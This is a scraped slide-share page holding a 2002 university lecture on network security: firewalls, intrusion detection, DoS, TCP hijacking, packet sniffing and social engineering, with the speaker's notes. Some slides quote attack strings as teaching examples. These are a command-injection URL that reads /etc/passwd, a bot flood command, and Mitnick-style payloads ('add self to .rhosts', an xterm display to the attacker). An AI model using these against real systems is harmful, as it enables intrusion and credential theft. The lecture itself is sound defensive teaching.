How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 

Lec21 security

  • 1. Network Security Justin Weisz jweisz@andrew.cmu.edu 15-441 Networks Fall 2002 1
  • 2. A Brief History of the World 15-441 Networks Fall 2002 2
  • 3. Overview  What is security?  Why do we need security?  Who is vulnerable?  Common security attacks and countermeasures – Firewalls & Intrusion Detection Systems – Denial of Service Attacks – TCP Attacks – Packet Sniffing – Social Problems 15-441 Networks Fall 2002 3
  • 4. What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. 15-441 Networks Fall 2002 4
  • 5. What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. 15-441 Networks Fall 2002 5
  • 6. What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. 15-441 Networks Fall 2002 6
  • 7. What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. 15-441 Networks Fall 2002 7
  • 8. Why do we need security?  Protect vital information while still allowing access to those who need it – Trade secrets, medical records, etc.  Provide authentication and access control for resources – Ex: AFS  Guarantee availability of resources – Ex: 5 9’s (99.999% reliability) 15-441 Networks Fall 2002 8
  • 9. Who is vulnerable?  Financial institutions and banks  Internet service providers  Pharmaceutical companies  Government and defense agencies  Contractors to various government agencies  Multinational corporations  ANYONE ON THE NETWORK 15-441 Networks Fall 2002 9
  • 10. Common security attacks and their countermeasures  Finding a way into the network – Firewalls  Exploiting software bugs, buffer overflows – Intrusion Detection Systems  Denial of Service – Ingress filtering, IDS  TCP hijacking – IPSec  Packet sniffing – Encryption (SSH, SSL, HTTPS)  Social problems – Education 15-441 Networks Fall 2002 10
  • 11. Firewalls  Basic problem – many network applications and protocols have security problems that are fixed over time – Difficult for users to keep up with changes and keep host secure – Solution • Administrators limit access to end hosts by using a firewall • Firewall is kept up-to-date by administrators 15-441 Networks Fall 2002 11
  • 12. Firewalls  A firewall is like a castle with a drawbridge – Only one point of access into the network – This can be good or bad  Can be hardware or software – Ex. Some routers come with firewall functionality – ipfw, ipchains, pf on Unix systems, Windows XP and Mac OS X have built in firewalls 15-441 Networks Fall 2002 12
  • 13. Firewalls Internet DMZ Web server, email server, web proxy, etc Firewall Firewall Intranet 15-441 Networks Fall 2002 13
  • 14. Firewalls  Used to filter packets based on a combination of features – These are called packet filtering firewalls • There are other types too, but they will not be discussed – Ex. Drop packets with destination port of 23 (Telnet) – Can use any combination of IP/UDP/TCP header information – man ipfw on unix47 for much more detail  But why don’t we just turn Telnet off? 15-441 Networks Fall 2002 14
  • 15. Firewalls  Here is what a computer with a default Windows XP install looks like: – 135/tcp open loc-srv – 139/tcp open netbios-ssn – 445/tcp open microsoft-ds – 1025/tcp open NFS-or-IIS – 3389/tcp open ms-term-serv – 5000/tcp open UPnP  Might need some of these services, or might not be able to control all the machines on the network 15-441 Networks Fall 2002 15
  • 16. Firewalls  What does a firewall rule look like? – Depends on the firewall used  Example: ipfw – /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet  Other examples: WinXP & Mac OS X have built in and third party firewalls – Different graphical user interfaces – Varying amounts of complexity and power 15-441 Networks Fall 2002 16
  • 17. Intrusion Detection  Used to monitor for “suspicious activity” on a network – Can protect against known software exploits, like buffer overflows  Open Source IDS: Snort, www.snort.org 15-441 Networks Fall 2002 17
  • 18. Intrusion Detection  Uses “intrusion signatures” – Well known patterns of behavior • Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc.  Example – IRIX vulnerability in webdist.cgi – Can make a rule to drop packets containing the line • “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”  However, IDS is only useful if contingency plans are in place to curb attacks as they are occurring 15-441 Networks Fall 2002 18
  • 19. Minor Detour…  Say we got the /etc/passwd file from the IRIX server  What can we do with it? 15-441 Networks Fall 2002 19
  • 20. Dictionary Attack  We can run a dictionary attack on the passwords – The passwords in /etc/passwd are encrypted with the crypt(3) function (one-way hash) – Can take a dictionary of words, crypt() them all, and compare with the hashed passwords  This is why your passwords should be meaningless random junk! – For example, “sdfo839f” is a good password • That is not my andrew password • Please don’t try it either 15-441 Networks Fall 2002 20
  • 21. Denial of Service  Purpose: Make a network service unusable, usually by overloading the server or network  Many different kinds of DoS attacks – SYN flooding – SMURF – Distributed attacks – Mini Case Study: Code-Red 15-441 Networks Fall 2002 21
  • 22. Denial of Service  SYN flooding attack  Send SYN packets with bogus source address – Why?  Server responds with SYN ACK and keeps state about TCP half-open connection – Eventually, server memory is exhausted with this state  Solution: use “SYN cookies” – In response to a SYN, create a special “cookie” for the connection, and forget everything else – Then, can recreate the forgotten information when the ACK comes in from a legitimate connection 15-441 Networks Fall 2002 22
  • 23. Denial of Service 15-441 Networks Fall 2002 23
  • 24. Denial of Service  SMURF – Source IP address of a broadcast ping is forged – Large number of machines respond back to victim, overloading it 15-441 Networks Fall 2002 24
  • 25. Denial of Service I C M P e c h o ( s p o o f e d s o u r c e a d d r e s s o f v ic t im ) S e n t to IP b ro a d c a s t a d d re s s IC M P e c h o r e p ly In te rn e t P e rp e tra to r V ic tim 15-441 Networks Fall 2002 25
  • 26. Denial of Service  Distributed Denial of Service – Same techniques as regular DoS, but on a much larger scale – Example: Sub7Server Trojan and IRC bots • Infect a large number of machines with a “zombie” program • Zombie program logs into an IRC channel and awaits commands • Example: – Bot command: !p4 207.71.92.193 – Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000 – Sends 10,000 64k packets to the host (655MB!) • Read more at: http://grc.com/dos/grcdos.htm 15-441 Networks Fall 2002 26
  • 27. Denial of Service  Mini Case Study – CodeRed – July 19, 2001: over 359,000 computers infected with Code-Red in less than 14 hours – Used a recently known buffer exploit in Microsoft IIS – Damages estimated in excess of $2.6 billion 15-441 Networks Fall 2002 27
  • 28. Denial of Service  Why is this under the Denial of Service category? – CodeRed launched a DDOS attack against www1.whitehouse.gov from the 20th to the 28th of every month! – Spent the rest of its time infecting other hosts 15-441 Networks Fall 2002 28
  • 29. Denial of Service  How can we protect ourselves? – Ingress filtering • If the source IP of a packet comes in on an interface which does not have a route to that packet, then drop it • RFC 2267 has more information about this – Stay on top of CERT advisories and the latest security patches • A fix for the IIS buffer overflow was released sixteen days before CodeRed had been deployed! 15-441 Networks Fall 2002 29
  • 30. TCP Attacks  Recall how IP works… – End hosts create IP packets and routers process them purely based on destination address alone  Problem: End hosts may lie about other fields which do not affect delivery – Source address – host may trick destination into believing that the packet is from a trusted source • Especially applications which use IP addresses as a simple authentication method • Solution – use better authentication methods 15-441 Networks Fall 2002 30
  • 31. TCP Attacks  TCP connections have associated state – Starting sequence numbers, port numbers  Problem – what if an attacker learns these values? – Port numbers are sometimes well known to begin with (ex. HTTP uses port 80) – Sequence numbers are sometimes chosen in very predictable ways 15-441 Networks Fall 2002 31
  • 32. TCP Attacks  If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!  Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source – Ex. Instead of downloading and running new program, you download a virus and execute it 15-441 Networks Fall 2002 32
  • 33. TCP Attacks  Say hello to Alice, Bob and Mr. Big Ears 15-441 Networks Fall 2002 33
  • 34. TCP Attacks  Alice and Bob have an established TCP connection 15-441 Networks Fall 2002 34
  • 35. TCP Attacks  Mr. Big Ears lies on the path between Alice and Bob on the network – He can intercept all of their packets 15-441 Networks Fall 2002 35
  • 36. TCP Attacks  First, Mr. Big Ears must drop all of Alice’s packets since they must not be delivered to Bob (why?) Packets The Void 15-441 Networks Fall 2002 36
  • 37. TCP Attacks  Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network) ISN, SRC=Alice 15-441 Networks Fall 2002 37
  • 38. TCP Attacks  What if Mr. Big Ears is unable to sniff the packets between Alice and Bob? – Can just DoS Alice instead of dropping her packets – Can just send guesses of what the ISN is until it is accepted  How do you know when the ISN is accepted? – Mitnick: payload is “add self to .rhosts” – Or, “xterm -display MrBigEars:0” 15-441 Networks Fall 2002 38
  • 39. TCP Attacks  Why are these types of TCP attacks so dangerous? Web server Trusting web client 15-441 Networks Fall 2002 Malicious user 39
  • 40. TCP Attacks  How do we prevent this?  IPSec – Provides source authentication, so Mr. Big Ears cannot pretend to be Alice – Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is 15-441 Networks Fall 2002 40
  • 41. Five Minute Break  For your enjoyment, here is something completely unrelated to this lecture: 15-441 Networks Fall 2002 41
  • 42. Packet Sniffing  Recall how Ethernet works …  When someone wants to send a packet to some else …  They put the bits on the wire with the destination MAC address …  And remember that other hosts are listening on the wire to detect for collisions …  It couldn’t get any easier to figure out what data is being transmitted over the network! 15-441 Networks Fall 2002 42
  • 43. Packet Sniffing  This works for wireless too!  In fact, it works for any broadcast-based medium 15-441 Networks Fall 2002 43
  • 44. Packet Sniffing  What kinds of data can we get?  Asked another way, what kind of information would be most useful to a malicious user?  Answer: Anything in plain text – Passwords are the most popular 15-441 Networks Fall 2002 44
  • 45. Packet Sniffing  How can we protect ourselves?  SSH, not Telnet – Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!) – Now that I have told you this, please do not exploit this information – Packet sniffing is, by the way, prohibited by Computing Services  HTTP over SSL – Especially when making purchases with credit cards!  SFTP, not FTP – Unless you really don’t care about the password or data – Can also use KerbFTP (download from MyAndrew)  IPSec – Provides network-layer confidentiality 15-441 Networks Fall 2002 45
  • 46. Social Problems  People can be just as dangerous as unprotected computer systems – People can be lied to, manipulated, bribed, threatened, harmed, tortured, etc. to give up valuable information – Most humans will breakdown once they are at the “harmed” stage, unless they have been specially trained • Think government here… 15-441 Networks Fall 2002 46
  • 47. Social Problems  Fun Example 1: – “Hi, I’m your AT&T rep, I’m stuck on a pole. I need you to punch a bunch of buttons for me” 15-441 Networks Fall 2002 47
  • 48. Social Problems  Fun Example 2: – Someone calls you in the middle of the night • “Have you been calling Egypt for the last six hours?” • “No” • “Well, we have a call that’s actually active right now, it’s on your calling card and it’s to Egypt and as a matter of fact, you’ve got about $2000 worth of charges on your card and … read off your AT&T card number and PIN and then I’ll get rid of the charge for you” 15-441 Networks Fall 2002 48
  • 49. Social Problems  Fun Example 3: – Who saw Office Space? – In the movie, the three disgruntled employees installed a money-stealing worm onto the companies systems – They did this from inside the company, where they had full access to the companies systems • What security techniques can we use to prevent this type of access? 15-441 Networks Fall 2002 49
  • 50. Social Problems  There aren’t always solutions to all of these problems – Humans will continue to be tricked into giving out information they shouldn’t – Educating them may help a little here, but, depending on how bad you want the information, there are a lot of bad things you can do to get it  So, the best that can be done is to implement a wide variety of solutions and more closely monitor who has access to what network resources and information – But, this solution is still not perfect 15-441 Networks Fall 2002 50
  • 51. Conclusions  The Internet works only because we implicitly trust one another  It is very easy to exploit this trust  The same holds true for software  It is important to stay on top of the latest CERT security advisories to know how to patch any security holes 15-441 Networks Fall 2002 51
  • 52. Security related URLs  http://www.robertgraham.com/pubs/network-intr  http://online.securityfocus.com/infocus/1527  http://www.snort.org/  http://www.cert.org/  http://www.nmap.org/  http://grc.com/dos/grcdos.htm  http://lcamtuf.coredump.cx/newtcp/ 15-441 Networks Fall 2002 52

Editor's Notes

  1. In other words, having systems in place beforehand which prevent attacks before they begin.
  2. Related to the first definition, having peace of mind knowing that your systems are safe and protected.
  3. This includes contingency plans for what to do when attackers strike, keeping up with the latest CERT advisories, hiring network security consultants to find insecurities in your network, etc.
  4. Why good? Because it lets you filter what comes in and what goes out. Why bad? If that point goes down, you are cut off from everyone else. Also, may have lots of congestion at that one point.
  5. Forge source IP so that the victim can’t figure out who you are.
  6. Alice can send a RESET
  7. Malicious user can send a virus to the trusting web client, instead of the program they thought they were downloading.
  8. Security techniques: IDS can be configured to look for internal inconsistencies in traffic patterns Firewalls can be configured to block off one part of a corporate network from another part to further restrict access Can also use hardware based identification tokens with strong encryption to identify who is doing what